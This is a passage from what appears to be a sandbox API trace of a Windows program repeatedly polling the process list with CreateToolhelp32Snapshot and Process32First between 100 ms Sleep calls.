(dwMilliseconds=0x64) [0270.519] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.534] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.607] Sleep (dwMilliseconds=0x64) [0270.610] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.622] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.676] Sleep (dwMilliseconds=0x64) [0270.677] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.692] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.760] Sleep (dwMilliseconds=0x64) [0270.763] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.775] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.831] Sleep (dwMilliseconds=0x64) [0270.833] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.846] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.900] Sleep (dwMilliseconds=0x64) [0270.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.916] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.970] Sleep (dwMilliseconds=0x64) [0270.971] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0270.983] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.071] Sleep (dwMilliseconds=0x64) [0271.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.085] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.142] Sleep (dwMilliseconds=0x64) [0271.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.157] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.233] Sleep (dwMilliseconds=0x64) [0271.235] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.250] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.308] Sleep (dwMilliseconds=0x64) [0271.310] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.321] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.419] Sleep (dwMilliseconds=0x64) [0271.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.433] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.492] Sleep (dwMilliseconds=0x64) [0271.494] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.506] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.570] Sleep (dwMilliseconds=0x64) [0271.572] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.583] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.712] Sleep (dwMilliseconds=0x64) [0271.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.725] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.783] Sleep (dwMilliseconds=0x64) [0271.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.797] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.850] Sleep (dwMilliseconds=0x64) [0271.854] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.870] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0271.943] Sleep (dwMilliseconds=0x64) [0271.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0271.959] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.052] Sleep (dwMilliseconds=0x64) [0272.054] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.067] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.145] Sleep (dwMilliseconds=0x64) [0272.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.181] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.263] Sleep (dwMilliseconds=0x64) [0272.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.279] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.340] Sleep (dwMilliseconds=0x64) [0272.344] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.367] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.441] Sleep (dwMilliseconds=0x64) [0272.444] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.461] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.535] Sleep (dwMilliseconds=0x64) [0272.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.559] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.634] Sleep (dwMilliseconds=0x64) [0272.636] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.648] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.714] Sleep (dwMilliseconds=0x64) [0272.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.731] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.802] Sleep (dwMilliseconds=0x64) [0272.804] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.818] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.907] Sleep (dwMilliseconds=0x64) [0272.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0272.930] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.041] Sleep (dwMilliseconds=0x64) [0273.043] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.061] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.152] Sleep (dwMilliseconds=0x64) [0273.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.170] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.243] Sleep (dwMilliseconds=0x64) [0273.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.268] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.345] Sleep (dwMilliseconds=0x64) [0273.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.375] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.470] Sleep (dwMilliseconds=0x64) [0273.472] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.489] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.559] Sleep (dwMilliseconds=0x64) [0273.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.577] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.648] Sleep (dwMilliseconds=0x64) [0273.652] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.670] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.742] Sleep (dwMilliseconds=0x64) [0273.744] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24b8 [0273.756] Process32First (in: hSnapshot=0x24b8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.829] Sleep (dwMilliseconds=0x64) [0273.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0273.851] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.931] Sleep (dwMilliseconds=0x64) [0273.934] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0273.952] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.205] Sleep (dwMilliseconds=0x64) [0274.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.224] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.300] Sleep (dwMilliseconds=0x64) [0274.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.316] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.390] Sleep (dwMilliseconds=0x64) [0274.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.406] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.477] Sleep (dwMilliseconds=0x64) [0274.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.501] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.585] Sleep (dwMilliseconds=0x64) [0274.587] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.602] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.674] Sleep (dwMilliseconds=0x64) [0274.678] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.692] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.775] Sleep (dwMilliseconds=0x64) [0274.777] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.793] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.858] Sleep (dwMilliseconds=0x64) [0274.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.875] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.939] Sleep (dwMilliseconds=0x64) [0274.944] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0274.957] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.046] Sleep (dwMilliseconds=0x64) [0275.049] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.067] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.140] Sleep (dwMilliseconds=0x64) [0275.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.155] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.226] Sleep (dwMilliseconds=0x64) [0275.229] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.244] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.316] Sleep (dwMilliseconds=0x64) [0275.318] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.334] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.436] Sleep (dwMilliseconds=0x64) [0275.441] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.457] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.521] Sleep (dwMilliseconds=0x64) [0275.523] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.540] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.611] Sleep (dwMilliseconds=0x64) [0275.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.626] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.689] Sleep (dwMilliseconds=0x64) [0275.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.707] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.777] Sleep (dwMilliseconds=0x64) [0275.778] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.792] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.859] Sleep (dwMilliseconds=0x64) [0275.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.878] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0275.948] Sleep (dwMilliseconds=0x64) [0275.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0275.965] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.059] Sleep (dwMilliseconds=0x64) [0276.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.080] Process32First (in: hSnapshot=0x1da8, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0276.146] Sleep (dwMilliseconds=0x64) [0276.148] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1da8 [0276.165] 